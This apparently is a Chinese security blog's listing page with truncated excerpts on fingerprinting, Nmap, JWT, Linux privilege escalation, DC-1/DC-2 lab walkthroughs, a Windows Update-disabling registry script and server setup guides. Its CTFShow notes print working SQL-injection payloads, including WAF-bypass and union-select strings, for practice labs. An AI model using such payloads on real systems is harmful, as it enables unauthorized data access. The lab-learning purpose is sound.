信息收集
未读架构源码识别当我们初次接触网站,需对其进行初步识别,核心包括域名数量、旁段地址、C段地址等信息收集——多数企业会重点防护主站点,可能忽略子域名或C段的安全,因此需从网站框架、前后端库、开源属性、流量特征切入,结合前端引入的JS文件、开发者面板加载项等细节,实现精准识别。
1. 从框架切入识别1.1 开源框架识别不同企业因预算差异会选择不同开源框架(如预算有限选Z-blog,追求稳定选ThinkPHP、Webman或WordPress),识别核心围绕“指纹匹配+信息延伸收集”,以下以kong.college为例展开。
1.1.1 开源CMS指纹识别工具通过专业工具直接匹配网站的开源框架特征,是最高效的初步识别方式,常用工具如下表:
工具类型
工具名称
地址/仓库链接
指纹识别
Wappalyzer
https://github.com/AliasIO/wappalyzer
指纹识别
TideFinger(潮汐)
http://finger.tidesec.net/
指纹识别
云悉指纹
https://www.yunsee.cn/
指纹识别
WhatWeb ...
应急响应任务环境说明:
服务器场景:Server2216(开放链接)
用户名:root密码:123456
引用站外地址
Server2216(Linux-SSH)
28.7分享的Server2216(Linux-SSH)
** 提示 **
1.0、黑客通过网络攻入本地服务器,通过特殊手段在系统中建立了多个异常进程,找出启动异常进程的脚本,并将其绝对路径作为Flag值提交题目提到了异常进程的脚本,一半异常的进程都有一个特征就是开机自启,或者在计划任务中,执行crontab -l时候,并没有发现计划任务,但是并不一定可靠,crontab -l查看的内容,实际上是查看一个文件的内容,该文件路径在/var/spool/cron/目录下,任务计划的文件名以用户名命名。
我们使用crontab -e 参数编辑当前用户root的任务计划
1crontab - ...
Windows 20年更新禁用脚本(注册表方式)1. 前置准备:显示文件扩展名默认情况下Windows会隐藏文件扩展名(如.txt、.reg),若不开启可能导致创建的文件格式错误,需先开启:
打开任意文件夹(如“此电脑”“桌面”);
点击顶部菜单栏的「查看」;
在“显示/隐藏”区域,勾选「文件扩展名」(勾选后可看到文件完整后缀,如“文档.txt”);
效果参考:
2. 创建注册表脚本文件(noUpdate.reg)注册表文件(.reg)可直接修改Windows系统配置,需严格按以下步骤创建:
回到桌面,右键点击空白处 → 「新建」→ 「文本文档」;
双击打开新建的文本文档,将以下注册表内容复制粘贴到文档中12345678910Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings]"FlightSettingsMaxPauseDays"=dword:00001b58"PauseFeatureUpd ...
Windows 镜像安装说明本方法基于Windows 10 x64家庭中文版,对于其他Windows版本(7、8、10、11)主机,该过程同样适用。本次环境是Pnet懒人版-v6,首先需要确认下/opt/unetlab/html/templates/路径下的yml模板文件,创建windows时,我们在
1/opt/unetlab/html/templates/intel
Windows的模板是我新增的
12345678910111213141516171819202122232425# Windows系列镜像模板# 通用最低配置要求:CPU-2、RAM-2048、虚拟磁盘-32G# 建议1C对应2G---type: qemudescription: "[微软] Windows"name: Windowscpulimit: 1icon: Server.pngcpu: 2ram: 4096ethernet: 1eth_format: eth{0}console: vncconsole_2nd: rdp-tlsusername: administ ...
一、Nmap 简介Nmap(Network Mapper)是一款开源免费的网络扫描与安全审计工具,核心用于探测网络中“存活主机-开放端口-运行服务-操作系统”等关键信息,广泛应用于:
网络诊断(如排查主机离线、端口占用问题)
安全评估(如渗透测试前的目标信息收集)
漏洞检测(结合服务版本判断潜在漏洞)
二、Nmap 完整选项列表Nmap 7.95 版本核心选项按功能分类如下,可根据需求组合使用:
12Nmap 7.95 (https://nmap.org) 用法:nmap [扫描类型] [选项] {目标指定}
1. 目标指定(TARGET SPECIFICATION)用于定义需要扫描的主机/网络范围,支持多种输入形式:
直接输入:主机名(如 scanme.nmap.org)、IP 地址(如 192.168.0.1)、网段(如 10.0.0.0/24)
-iL <输入文件名>:从文件读取目标列表(每行一个主机/网段)
-iR <主机数量>:随机选择指定数量的目标主机
--exclude <host1,h ...
一、什么是JWTpyjwt 使用教程https://blog.pcat.cc/%e5%ae%89%e8%a3%85%e4%bd%bf%e7%94%a8%e6%96%b9%e6%b3%95/Web/jwtcrack
1.1 核心定义JWT(JSON Web Token)是一种紧凑、自包含的轻量级规范,用于在网络各方之间安全传递 JSON 格式的声明信息。它通过数字签名保证信息的完整性和真实性,常见应用场景包括:
身份验证(如用户登录后携带令牌访问接口)
信息交换(如服务间传递可信业务数据)
单点登录(SSO)、用户权限标记等
1.2 核心特点1.2.1 紧凑性JWT 通过 Base64 编码将复杂 JSON 数据压缩为简短字符串,便于在 URL、HTTP 头或 Cookie 中传输。例如以下简化版 JWT(仅含 Header.Payload,无 Signature),解码后可直接获取原始 JSON 数据:
1eyJhbGciOiJoczI1NiIsInR5cCI6Imp3dCJ9.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE3NTQ4MzQ0MzIsImV4cCI6 ...
渗透测试基础
未读Linux 提权基础:用户权限与信息收集前言
信息收集是渗透测试还是内网攻防,提权都扮演着 “承上启下” 的核心角色:
对渗透测试:没有提权,测试结果仅能覆盖 “表层漏洞”,无法全面评估系统风险;
对真实攻防:没有提权,攻击者只能停留在 “初始访问点”,无法深入内网、控制核心资产。
简言之,提权的本质是突破权限限制,将 “有限访问能力” 转化为 “深度控制能力” —— 它是连接 “初始 foothold(立足点)” 与 “核心目标” 的唯一路径,也是评估防御体系有效性、实现攻防对抗目标的关键环节。
一、Linux 用户和组用户组是 Linux 系统权限管理的核心载体,既方便用户间共享文件,也让管理员可通过“组权限分配”替代“单个用户授权”,提升管理效率。
Linux 用户按权限和用途分为三类,且每个用户必须归属至少一个组(无法独立于组存在);用户组的核心信息存储于 /etc/group 文件中,可通过 cat /etc/group 查看。
用户类型
UID 范围
核心权限与用途
Windows 类比对象
系统管理员
0(仅 root 账户)
拥有系统全部权 ...
准备靶机DC-1靶场渗透测试:SUID提权与Drupal 7 GetShell实战涉及工具:Kali Linux、whatweb、nmap、arp-scan、dirsearch、msfconsole、hydra核心目标:完成DC-1靶场全流程渗透,获取5个flag并通过SUID提权至root权限
其他靶机
引用站外地址
DC-1靶场渗透测试-suid提权-Drupal 7-GetShell Kali-whatweb-nmap-arp使用
DC-2 靶场复现以及靶机分享(提权,信息收集)
引用站外地址
DC-2 靶场复现
DC-2 靶场复现以及靶机分享(提权,信息收集)
引用站外 ...
一、Win2016-A1的核心任务Win2016-A1是整个信息系统的主域与核心基础服务节点,需完成3类关键服务部署,具体如下:
(一)主域控制器服务器部署Win-2016-A1
升级为sec.com域的主域控制器,完全域名为dc.sec.com;
由于电脑比较多,所以重命名电脑
安装DNS,AD域
选择创建新林
配置还原密码 sec.com@2025
自动分配,其他的直接默认下一步,直到安装按钮出现
安装成功后如下
启用 Active Directory 回收站功能
在AD管理中心,点击侧边栏sec(本地)按钮,右键选择,启用会收站
(二)主DNS服务器部署
配置为sec.com域的主DNS服务器:
创建sec.com域名的正向、反向解析区域;
按“表10:域名信息表1”(含Win2016-A1→dc.sec.com、Win2016-B3→jdk.sec.com等记录)创建主机记录;
关闭网络掩码排序功能,将DNS正反向区域与活动目录(AD)集成,启用Active Directory回收站功能。
通过 “服务器管理器→工具→DNS” 打 ...
在 Ubuntu 22.04 (Jammy Jellyfish) 安装 Zabbix Server
引用站外地址
Zabbix 6.0.41 监控Windows
Zabbix部署监控Windows-Server 主动检查与被动插件 最佳实践
引用站外地址
Zabbix 6.0.41 监控Linux
Zabbix部署监控Linux-Server 主动检查与被动插件 最佳实践
中文方法
引用站外地址
Zabbix切换中文面板
Zabbix切换中文面 ...
虚拟主机信息表
该文档是一份详细的信息系统搭建操作指南,核心目标是基于 Windows Server 2016 和 CentOS 两类操作系统,在指定 VLAN 的多台虚拟主机上,部署域名解析、域控管理、网站服务、文件传输、邮件服务、数据库、集群高可用、磁盘冗余(RAID)等核心组件,最终构建一个功能完整、权限可控、具备高可用和数据安全保障的综合性信息系统,当然,本文内容较长,我们将分成几个大类,当然了,所有的内容都是在我验证过后写出来的
目标该文档是一份详细的信息系统搭建操作指南,核心目标是基于Windows Server 2016和CentOS两类操作系统,在指定VLAN的多台虚拟主机上,部署域名解析、域控管理、网站服务、文件传输、邮件服务、数据库、集群高可用、磁盘冗余(RAID)等核心组件,最终构建一个功能完整、权限可控、具备高可用和数据安全保障的综合性信息系统。
一、基础环境:虚拟主机与网络规划首先明确了系统的“硬件载体”——12台虚拟主机,按操作系统类型和VLAN划分,为后续服务部署划定网络边界,具体如下:
操作系统类型
虚拟主机名称
所属VLAN
核心角色定位
...
计算机原理
未读计算机中的信息表示 - 数据篇计算机以二进制(0和1) 作为底层信息存储与运算的基础,所有数据(数值、字符、图像等)最终都需转换为二进制形式。本文将从数值表示(原码、反码、补码)和字符编码(ASCII及扩展体系)两大核心维度,详解计算机如何“理解”数据。
一、数值表示:原码、反码与补码计算机处理数值时需区分正负,因此引入“符号位”(最高位,0表示正数,1表示负数)。原码、反码、补码是二进制数值的三种表示方式,核心差异在于负数的处理逻辑,最终补码因解决了原码/反码的缺陷,成为计算机实际使用的标准。
1. 原码(True Form)定义最高位为符号位(0正/1负),其余位(数值位)直接表示数值的绝对值。是最直观的二进制表示方式。
示例(8位系统,1字节=8位)
十进制数值
原码(二进制)
说明
+5
0000 0101
符号位0(正),数值位0101
-5
1000 0101
符号位1(负),数值位0101
+0
0000 0000
符号位0,数值位全0
-0
1000 0000
符号位1,数值位全0
核心问题
存在“+0”和“-0” ...
Web 181:过滤函数绕过(利用OR优先级)解题核心是在过滤函数中构造特殊语句,利用SQL中AND优先级高于OR的特性绕过限制。
关键Payload1-1'%0cor%0cusername%0clike%0c'flag
拼接后的SQL语句123select id,username,password from ctfshow_user where (username !='flag' and id = '" -1') %0cor%0c(username%0clike%0c'flag "' )limit 1;
过滤函数123function waf($str){ return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);}
另一个有效Payload1-1'||username='flag
...
CTFShow-web-vip/SQL 171-175(union注入)本文档整理CTFShow-web-vip板块中SQL 171-175题的Union注入解题思路,涵盖基础闭合、联合查询、WAF绕过、bool注入、文件导出等核心考点,每道题明确考点差异与关键步骤,代码与结果可视化结合,便于理解与复现。
web 171:基础SQL闭合注入考点
单引号闭合与注释绕过
排除条件username !='flag'的绕过
核心SQL语句(后端)1$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
解题步骤
闭合测试与逻辑绕过利用or逻辑覆盖username !='flag'的限制,同时用注释符--+(URL中可替换为%23)注释后续SQL语句:
1234# 方法1:直接闭合+逻辑真?i ...
CTFShow-web-vip/SQL 176-180 解题笔记(Union注入专题)web 176:基础过滤探测题目分析题目提示对传入参数进行了简单过滤(waf($str) 代码未展示),核心目标是突破过滤并触发SQL注入。
注入思路
先使用基础万能密码探测注入点是否存在,验证参数是否可控。
若万能密码生效,说明过滤规则较简单,可进一步推进Union注入。
关键Payload1?id=' or 1=1 --+
作用:闭合原SQL语句的单引号,通过or 1=1使条件恒真,--+注释掉后续语句,实现“万能登录”或数据泄露。
web 177:/**/ 绕过空格过滤题目分析WAF过滤了空格,需用/**/(SQL注释符)替代空格,保证SQL语法合法。
注入步骤(手动复现)1. 验证注入点与字段数1?id=1'/**/union/**/select/**/1,2,3%23
说明:%23是URL编码的#,用于注释后续内容;返回结果若显示2或3,说明字段数为3且这两个位置可回显。
2. 查询数据库中的表名1?id=1'/**/un ...
DC-2靶场渗透实战:git提权+rbash逃逸+社工工具(cewl/wpscan)其他靶机
引用站外地址
DC-1靶场渗透测试-suid提权-Drupal 7-GetShell Kali-whatweb-nmap-arp使用
DC-2 靶场复现以及靶机分享(提权,信息收集)
引用站外地址
DC-4 靶场复现
DC-4 靶场复现以及靶机分享(提权,信息收集,shell反弹,爆破)
引用站外地址
DC-5 靶场复现
DC-5 靶机渗透 ...
















